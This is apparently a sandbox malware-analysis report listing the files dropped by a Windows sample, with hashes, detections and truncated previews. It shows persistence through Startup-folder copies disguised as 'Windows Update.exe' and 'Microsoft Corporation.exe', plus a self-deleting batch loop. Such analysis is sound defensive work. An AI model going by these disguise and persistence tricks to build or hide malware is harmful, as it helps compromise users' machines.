Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\LisectAVT_2403002B_366.exe.log

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_366.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.259753436570609
Encrypted:	false
SSDEEP:	12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
MD5:	260E01CC001F9C4643CA7A62F395D747
SHA1:	492AD0ACE3A9C8736909866EEA168962D418BE5A
SHA-256:	4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
SHA-512:	01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
Malicious:	true
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\Microsoft Corporation.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.259753436570609
Encrypted:	false
SSDEEP:	12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
MD5:	260E01CC001F9C4643CA7A62F395D747
SHA1:	492AD0ACE3A9C8736909866EEA168962D418BE5A
SHA-256:	4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
SHA-512:	01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\History\Explower.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Explower.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k2[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k2[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k3[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k4[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k5[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Explower.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\070901E5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\0BFF4E1D.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\12A86BAB.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\2266597f.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	196
Entropy (8bit):	5.003210364942915
Encrypted:	false
SSDEEP:	6:jdKoN723fRZMD2UN723fRj/dKoN723fkn:jIMaJYaJj/IMaMn
MD5:	00429F0ED357144B21F3D993896D9FA9
SHA1:	0370EF87824534AB3A8FFAF946D5D1D37BFDA519
SHA-256:	1CF3D318DBE8109725B61F2CDD46184606065B74F7D1497BA8035E1FCFE45CC8
SHA-512:	C70C27C393D70CC875A8749369834D3C381A4C1BFF90399A75E2B967BFA2DAB00BA5F35C817B90473F26FEC6BA55BAFA21B42C4F210BEF9622F33927C788669A
Malicious:	false
Preview:	:DELFILE..del "C:\Users\user\AppData\Local\Temp\RRqyIX.exe"..if exist "C:\Users\user\AppData\Local\Temp\RRqyIX.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\2266597f.bat"..

C:\Users\user\AppData\Local\Temp\24de2542.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	196
Entropy (8bit):	4.955025648699968
Encrypted:	false
SSDEEP:	6:jdKoN723fRZMD2UN723fRj/dKoN723fuQeSn:jIMaJYaJj/IMaXeSn
MD5:	80CBA390C37BC1D6FE1F8A880B91D538
SHA1:	F12C6E52C2CD413FC8878B35A49C8698E03CAFFE
SHA-256:	6A4D2A054CC21DEBF1D1A92719449F32B4A1CF03488CDCDDFB59DEC0602A0A2D
SHA-512:	B42D6751D4366D83E7C0C0394B08400EAC1F8F7052EEAB71B8ABCBC6F61EF835B02D040157F75BE86C174DE10A3518DDF4490F9032DA717BD76B7CCF74A85488
Malicious:	false
Preview:	:DELFILE..del "C:\Users\user\AppData\Local\Temp\RRqyIX.exe"..if exist "C:\Users\user\AppData\Local\Temp\RRqyIX.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\24de2542.bat"..

C:\Users\user\AppData\Local\Temp\3DED6F9C.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\48010AB1.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\5BCD317B.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\62724210.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_366.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031075575407894
Encrypted:	false
SSDEEP:	384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
MD5:	F7D21DE5C4E81341ECCD280C11DDCC9A
SHA1:	D4E9EF10D7685D491583C6FA93AE5D9105D815BD
SHA-256:	4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
SHA-512:	E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\server.exe

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_366.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\app

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_366.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:j:j
MD5:	CAC4598FDC0F92181616D12833EB6CA1
SHA1:	80A7B7A46A0E8E674B782B9EB569E5430A69C84B
SHA-256:	275918973C23AD700F278C69CC03C9C82EC9F4D9ED0F53111AD22BEC197FF440
SHA-512:	01A7556BFCCE6D9D8251AADC7F6E6169FDD0477D487CE88729C44BFE8B85B2EEE500985D553C0479765EF5B5C6DC3517C0305EFB9089814C3F8A9EA6FC51C713
Malicious:	false
Preview:	.25

C:\Users\user\Desktop\Explower.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\Explower.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Favorites\Explower.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
